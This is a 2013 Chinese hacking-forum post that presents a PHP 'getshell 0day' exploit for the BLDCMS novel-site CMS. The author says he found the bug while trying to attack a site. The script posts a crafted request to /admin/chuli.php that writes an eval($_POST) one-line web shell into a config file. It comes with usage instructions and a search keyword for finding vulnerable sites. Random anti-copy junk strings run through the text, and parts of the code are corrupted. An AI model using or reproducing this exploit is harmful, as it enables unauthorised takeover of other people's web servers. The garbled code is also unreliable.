中国网络渗透测试联盟

标题: BLDCMS(白老大小说) Getshell 0day EXP [打印本页]

作者: admin    时间: 2013-3-26 20:49
标题: BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞" U" Z4 V0 C, i0 l
* [& j. t" v0 x2 e- d

% Z" h6 _! K% I% I话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
* {) c0 f9 `  m, J9 \( Q. ]# u+ M$ }8 Z. o / M' k1 ?  l+ a2 d% g0 w
既然都有人发了 我就把我之前写好的EXP放出来吧. R( ]! l: o# |; V3 T+ v/ m& h

8 ?3 _, G$ c* V) K2 u  N5 N2 Yview source print?01.php;">
8 r$ Z5 Y+ |7 C: y& Z3 Y8 ^02.<!--?php8 w3 G& q( k! x8 p) p
03.echo "-------------------------------------------------------------------/ M' m3 d* ?/ q: z; j) H, P
04. ) d" H. _8 v* ]8 _+ U
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP  }. f9 M- O, V
06. , E6 X. v5 @( R% f. M' x
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
% V8 ^1 O" L3 r3 A08.
, o- F* W! p3 @5 j  ~7 k09.QQ:981009941\r\n                                2013.3.21\r\n             8 L& v. o0 c  u8 Z2 q+ S
10. 4 D9 r1 V' u0 r# j: p
11.
' u8 e. A% u1 G1 H' l" d+ @$ \12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 e* g# [* u, N* d- Z- a3 z13.
9 [; p) Q; _  W* w6 m1 ?14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 E7 l& Z0 I3 x, v7 G& a15. ; I1 R7 p3 ?5 o& b- l' `( ]! Z
16.--------------------------------------------------------------------\r\n";1 ~) `8 v( C) Z: f0 }
17.$url=$argv[1];
+ {5 G% V. W& _& }  E: b18.$dir=$argv[2];
  `( G7 b0 k3 C19.$pass=$argv[3];
9 _/ t) X3 r5 z20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';, R9 }( v- W9 L
21.if (emptyempty($pass)||emptyempty($url)); `2 |' g' R. |" r* ?
22.{exit("请输入参数");}; P/ T# G- h( p' c+ p
23.else
2 z. m  l1 f8 D6 W# Z3 h! n24.{
! I2 y3 E# B6 ^7 `# {3 |$ v25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
- O$ e$ L. K" g0 g9 e. ?26. / a, j5 E  y$ m/ n& G4 S% Y; @0 R
27.al;: A. X0 N! s6 r8 p  O
28.$length = strlen($fuckdata);: T5 g" p' \  X6 H5 ~  ^% x  O  u
29.function getshell($url,$pass)$ l( t7 y) r3 ~% p# j3 }0 x" M
30.{
. z$ P, m* N0 z! R. [# C31.global $url,$dir,$pass,$eval,$length,$fuckdata;: ^. }$ N/ t$ N6 o9 _+ O
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";& Z# v0 p- v& ?+ t7 J
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
0 H4 B3 K5 B6 T! r34.$header .= "User-Agent: MSIE\r\n";
: o& L7 I. B/ z/ o9 n, z& L35.$header .= "Host:".$url."\r\n";4 v6 l- \( G7 t/ @* K; u* I- ?! Y
36.$header .= "Content-Length: ".$length."\r\n";4 g, c4 o2 M; o  ~
37.$header .= "Connection: Close\r\n";; F! F) o. R) w3 Z4 h3 [" P
38.$header .="\r\n";
9 T( q. Q$ m$ o6 z. _39.$header .= $fuckdata."\r\n\r\n";
* Y$ `9 d" i1 u1 V* I' D% G40.$fp = fsockopen($url, 80,$errno,$errstr,15);
+ l( v& ~5 X+ P  F* C41.if (!$fp)
) p/ _% z. c9 j: s/ h( |42.{& g2 c/ G) Q" l* P5 \
43.exit ("利用失败:请检查指定目标是否能正常打开");
9 L, M% Q  v# a0 q  c0 m4 ?44.}5 a1 B- W. ]8 i. g( s( J7 T
45.else{ if (!fputs($fp,$header))
9 ]& y! a7 h. Y. F; I! H46.{exit ("利用失败");}
8 e! I5 b- @0 ^- `3 j47.else5 W( x! m- ?8 b9 v: R- L
48.{. R8 G/ F8 s9 n" H! M
49.$receive = '';! D/ Z  _0 N, ]" v, F# N
50.while (!feof($fp)) {
3 R, x( x9 G* h/ M" k* o51.$receive .= @fgets($fp, 1000);! @# J/ P4 t& _3 w* P  C3 K( E
52.}
, n1 @, W7 [: b8 y( }( Q9 |53.@fclose($fp);% o$ W2 a: Y5 Z8 D3 v
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标+ d3 a! v7 S0 [) V
55.   o, w. U) z) \% `6 O5 K
56.GPC是否=off)";! \) b; C2 F. R" B; [" R( T' q
57.}}# J: ?% @5 |2 v( @2 I
58.}
- J. h2 E2 I0 ?+ `, c# b59.}
7 S4 n: _) y$ ^# O60.getshell($url,$pass);
- q+ h7 K- j8 U8 b4 ]2 t4 }61.?-->' p: L7 P3 n& q0 {4 r' c
4 t. h# u6 b; q/ x1 }) x
2 `: E2 @! P" H5 @4 ~
; G: V  E$ E& r
by 数据流
2 s0 h  Z0 P+ v1 w4 Q




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2